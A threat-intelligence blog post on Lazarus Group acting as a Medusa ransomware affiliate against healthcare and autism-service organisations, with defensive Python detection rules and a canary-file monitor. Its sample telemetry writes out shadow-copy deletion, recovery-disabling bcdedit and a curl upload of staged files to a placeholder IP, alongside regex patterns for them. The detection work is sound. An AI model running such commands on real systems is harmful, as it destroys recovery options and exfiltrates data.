North Korea's most notorious hacking group just made a career move. According to reports from Symantec, Carbon Black, and Broadcom's threat intelligence division, the Lazarus Group (aka Diamond Sleet, Pompilus) is now operating as an affiliate of the Medusa ransomware-as-a-service (RaaS) operation.
This is not Lazarus building their own ransomware. This is a nation-state APT group joining a commercial cybercrime franchise.
Why This Matters
Lazarus Group and the North Korean units operating alongside it have historically developed custom ransomware — SHATTEREDGLASS, Maui, H0lyGh0st — bespoke tools for targeted operations. But starting in October 2024, when Andariel was observed working with the Play ransomware operation, North Korean groups began adopting a new strategy:
Why build your own ransomware when you can use someone else's?
Medusa RaaS, operated by the Spearwing group since 2023, provides the ransomware payload, leak site, and negotiation infrastructure. Lazarus brings the access, the persistence, and the operational security of a state-backed threat actor.
The result: nation-state capabilities with commercial ransomware efficiency.
Who They Are Targeting
The victims tell a disturbing story:
- U.S. healthcare organizations — at least 4 targets since November 2025
- Mental health facilities
- Autism education nonprofits
- Social services organizations
- One confirmed breach of an unnamed entity in the Middle East
Average ransom demand: 60,000, a figure calibrated to be high enough to make the operation worthwhile for the attackers, yet low enough that an organization which cannot survive extended downtime might actually pay it.
As one security researcher noted: "Targeting facilities dedicated to mental health and autistic children demonstrates maximum emotional leverage with volume-based approaches targeting chronically underfunded sectors."
The Kill Chain
Lazarus does not just drop Medusa and walk away. They deploy a full arsenal:
Tools Used
| Tool | Purpose |
|---|---|
| Comebacker | Custom backdoor (Lazarus-exclusive) |
| BLINDINGCAN (AIRDRY/ZetaNile) | Remote access trojan |
| InfoHook | Information stealer and data staging |
| RP_Proxy | Custom proxy for internal traffic routing |
| Mimikatz | Credential dumping |
| ChromeStealer | Chrome password extraction |
| curl | Data exfiltration |
| Medusa | Ransomware payload (final stage) |
Attack Sequence
- Initial access — method varies per target
- Disable security — local AV and EDR protections dismantled
- Deploy backdoors — Comebacker and BLINDINGCAN for persistent access
- Harvest credentials — Mimikatz for Windows creds, ChromeStealer for browser passwords
- Stage data — InfoHook scans and stages sensitive files
- Route traffic — RP_Proxy handles internal data movement
- Exfiltrate — data stolen before encryption
- Deploy Medusa — ransomware as the final payload
This is not a smash-and-grab. It is a methodical, multi-stage operation that ensures Lazarus maintains access even if the ransomware is detected and blocked.
What Defenders Should Watch For
Medusa Indicators
- Mass file rename: every encrypted file gets a new extension appended, typically visible as a burst of rename events across many directories in seconds
- Ransom note dropped into each affected directory
- Volume Shadow Copy deletion (vssadmin or WMI shadow-copy removal) to block rollback
- Recovery disabled through boot-configuration changes (bcdedit) so Windows cannot repair or restore itself
Lazarus-Specific Indicators
- DLL sideloading: a malicious DLL loaded by a legitimate, signed binary, either planted in that application's install directory or copied alongside a copy of the binary into a user-writable path
- Comebacker C2 callbacks — check CISA advisories for known infrastructure
- BLINDINGCAN network signatures — documented in CISA MAR reports
- ChromeStealer reading Chrome's credential SQLite database (the Login Data file under the user's Chrome profile) from a process that is not chrome.exe
Detection Events
- LSASS access: Sysmon Event ID 10 targeting lsass.exe
- Credential dumping: Mimikatz command-line and module-name patterns (sekurlsa), and LSASS memory dumps written to disk
- Lateral movement: Unusual SMB/RPC from non-admin workstations
- Proxy activity: Internal port forwarding or SOCKS indicators
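The detection events above, as an added worked example that is not part of the original briefing or any of its cited vendors' tooling: a small Python rule set run over constructed Sysmon-style events. Field names (EventID, Image, CommandLine, SourceImage, TargetImage, GrantedAccess, ImageLoaded) follow Sysmon's schema; the events, user names, paths and the 203.0.113.7 address are fabricated for illustration, and the allowlists and DLL-name list are starting points to tune for your environment, not complete lists.

```python
"""Pre-ransomware detection rules over Sysmon-style events (added example).
Covers: shadow-copy / recovery tampering (EID 1), LSASS access from an
unexpected image (EID 10), DLL sideloading outside the Windows directory
(EID 7), and curl being used to upload a file (EID 1)."""
import json
import re
from pathlib import PureWindowsPath

# Constructed sample telemetry (JSON lines); none of it is real.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin delete shadows /all /quiet", "User": "CORP\\svc-backup"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\bcdedit.exe", "CommandLine": "bcdedit /set {default} recoveryenabled no", "User": "CORP\\svc-backup"}
{"EventID": 10, "SourceImage": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"}
{"EventID": 10, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1fffff"}
{"EventID": 7, "Image": "C:\\Users\\jdoe\\AppData\\Roaming\\Editor\\editor.exe", "ImageLoaded": "C:\\Users\\jdoe\\AppData\\Roaming\\Editor\\version.dll", "Signed": "false"}
{"EventID": 7, "Image": "C:\\Program Files\\Editor\\editor.exe", "ImageLoaded": "C:\\Windows\\System32\\version.dll", "Signed": "true"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe", "CommandLine": "curl -k -T C:\\staging\\hr.zip https://203.0.113.7/upload", "User": "CORP\\jdoe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe", "CommandLine": "curl https://updates.example.internal/manifest.json", "User": "CORP\\jdoe"}
"""

# Commands that remove rollback options right before encryption.
SHADOW_OR_RECOVERY = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"bcdedit(\.exe)?\s+.*recoveryenabled\s+no", re.I),
    re.compile(r"bcdedit(\.exe)?\s+.*bootstatuspolicy\s+ignoreallfailures", re.I),
]
# curl switches that send a local file somewhere: -T/--upload-file, -d @file, -F field=@file.
CURL_UPLOAD = re.compile(r"(?:^|\s)(?:-T|--upload-file|--data-binary\s+@|-d\s+@|-F\s+\S+=@)", re.I)
# Images that legitimately open LSASS; tune this allowlist (add your AV/EDR engine).
LSASS_ALLOWED = {"csrss.exe", "wininit.exe", "services.exe", "lsm.exe", "msmpeng.exe"}
PROCESS_VM_READ = 0x0010  # the access right credential dumpers cannot do without
# DLL names commonly planted next to a signed host binary for sideloading (assumed list).
SIDELOAD_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll", "userenv.dll", "mpr.dll"}


def _is_windows_dir(path: str) -> bool:
    return path.lower().replace("/", "\\").startswith("c:\\windows\\")


def detect(jsonl: str) -> list[dict]:
    """Return one {'rule', 'detail'} record per matching event."""
    hits = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        eid = ev.get("EventID")
        if eid == 1:  # process creation
            cmd = ev.get("CommandLine", "")
            if any(p.search(cmd) for p in SHADOW_OR_RECOVERY):
                hits.append({"rule": "shadow_copy_or_recovery_tampering", "detail": cmd})
            if PureWindowsPath(ev.get("Image", "")).name.lower() == "curl.exe" and CURL_UPLOAD.search(cmd):
                hits.append({"rule": "curl_upload", "detail": cmd})
        elif eid == 10:  # process access
            if PureWindowsPath(ev.get("TargetImage", "")).name.lower() != "lsass.exe":
                continue
            src = ev.get("SourceImage", "")
            access = int(ev.get("GrantedAccess", "0x0"), 16)
            trusted = PureWindowsPath(src).name.lower() in LSASS_ALLOWED and _is_windows_dir(src)
            if access & PROCESS_VM_READ and not trusted:
                hits.append({"rule": "lsass_access_from_unexpected_image", "detail": f"{src} ({hex(access)})"})
        elif eid == 7:  # image load
            loaded = ev.get("ImageLoaded", "")
            if PureWindowsPath(loaded).name.lower() in SIDELOAD_NAMES and not _is_windows_dir(loaded):
                hits.append({"rule": "dll_sideload_candidate", "detail": f"{ev.get('Image')} loaded {loaded}"})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"{hit['rule']:40s} {hit['detail']}")
```

Two things to keep in mind when running this against real Sysmon data: the LSASS rule keys on the PROCESS_VM_READ bit rather than on exact masks such as 0x1010, because dumpers vary the rest of the mask, and it allowlists by both image name and directory, since an attacker can name a binary csrss.exe but cannot easily write it into System32. Expect legitimate AV and EDR engines to open LSASS with broad masks; add them to the allowlist by full path rather than suppressing the rule.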
The Bigger Picture
This represents a fundamental shift in the threat landscape:
1. Attribution becomes harder. When North Korea uses Medusa, it looks like any other Medusa affiliate. Defenders cannot easily distinguish state-sponsored attacks from criminal ones.
2. Healthcare is increasingly targeted. Underfunded organizations with critical operations and sensitive data are ideal ransomware targets. The emotional leverage of targeting mental health and disability services creates additional pressure to pay.
3. The RaaS model is attracting nation-states. If Lazarus and Andariel are joining commercial RaaS programs, other state-backed groups will follow. Expect more convergence between state-sponsored and criminal operations.
4. Defense must focus on pre-ransomware activity. By the time Medusa deploys, the attacker has already been inside for days or weeks. Detecting the backdoors, credential theft, and data staging is far more effective than trying to stop the ransomware itself.
Practical Defense Steps
- Monitor for LSASS access — this catches Mimikatz and similar tools, but expect noise from legitimate AV/EDR engines and allowlist them by full path rather than disabling the alert
- Watch for VSS deletion — the clearest pre-encryption indicator, though by the time it fires encryption is usually minutes away, so it should trigger automated isolation, not a ticket
- Segment backup infrastructure — Lazarus targets backup systems to prevent recovery
- Implement canary files — detect mass file operations before encryption completes
- Review Chrome credential storage — enterprise credential managers reduce ChromeStealer impact
- Check CISA advisories — regularly updated IOCs for Lazarus tools
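The canary-file step above, as an added worked example that is not from the briefing's sources or any vendor product: a Python monitor that plants decoy documents named to sort first and last in a directory listing (encryption loops normally walk directories in order, so the decoys are hit early), records their hashes, and reports any canary that was rewritten, renamed or removed. The file names, payload and the simulated encryption pass are constructed for the demo; in production the check would run on a schedule and feed an isolation playbook.

```python
"""Canary-file monitor for early detection of mass file operations (added example)."""
import hashlib
import os
import tempfile
from pathlib import Path

# Names chosen to land at the start and end of an alphabetical enumeration (assumed convention).
CANARY_NAMES = ("!_budget_2025.xlsx", "zz_payroll_backup.docx")
CANARY_PAYLOAD = b"CANARY-DO-NOT-EDIT " * 64  # inert filler; real decoy bytes would look like a document


def _sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def plant_canaries(root: Path) -> dict[str, str]:
    """Create the canaries under root and return a {path: sha256} baseline to check against later."""
    baseline = {}
    for name in CANARY_NAMES:
        p = root / name
        p.write_bytes(CANARY_PAYLOAD)
        baseline[str(p)] = _sha256(p)
    return baseline


def check_canaries(baseline: dict[str, str]) -> list[tuple[str, str]]:
    """Return (path, reason) for every canary that no longer matches the baseline."""
    alerts = []
    for path, digest in baseline.items():
        p = Path(path)
        if not p.exists():
            alerts.append((path, "missing_or_renamed"))   # new extension appended, or deleted
        elif _sha256(p) != digest:
            alerts.append((path, "content_changed"))      # rewritten in place, as encryption does
    return alerts


def simulate_overwrite(root: Path) -> None:
    """Constructed stand-in for an encryptor's first pass: rewrite every file's contents in place."""
    for p in sorted(root.iterdir()):
        if p.is_file():
            p.write_bytes(os.urandom(len(p.read_bytes())))


def simulate_rename(root: Path, new_ext: str = ".locked") -> None:
    """Constructed stand-in for the rename pass: append an extension to every file."""
    for p in sorted(root.iterdir()):
        if p.is_file():
            p.rename(p.with_name(p.name + new_ext))


def demo() -> dict:
    """Plant canaries beside an ordinary file, then run both simulated passes and check after each."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "report.docx").write_bytes(b"ordinary user document")
        baseline = plant_canaries(root)
        clean = check_canaries(baseline)
        simulate_overwrite(root)
        after_overwrite = sorted(reason for _, reason in check_canaries(baseline))
        simulate_rename(root)
        after_rename = sorted(reason for _, reason in check_canaries(baseline))
        return {"clean": len(clean), "after_overwrite": after_overwrite, "after_rename": after_rename}


if __name__ == "__main__":
    print(demo())
```

The monitor deliberately distinguishes a rewritten canary from a missing one: the first fires while the encryptor is still mid-directory, the second only after the rename pass, so a content-changed alert is the one worth wiring to automatic host isolation. Hash checks on a schedule are simple and portable; a filesystem-watch API gives lower latency if the platform supports it.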
Test Your Ransomware Readiness
Could your organization detect a Lazarus-style attack before ransomware deployment? TheInsider-x.com offers free AI-powered penetration testing during our beta — including ransomware readiness assessment.
Sources: Symantec/Broadcom Threat Intelligence, Carbon Black Threat Hunter Team, TheHackerNews, BleepingComputer, HackRead
Part of our Threat Intelligence Briefing series.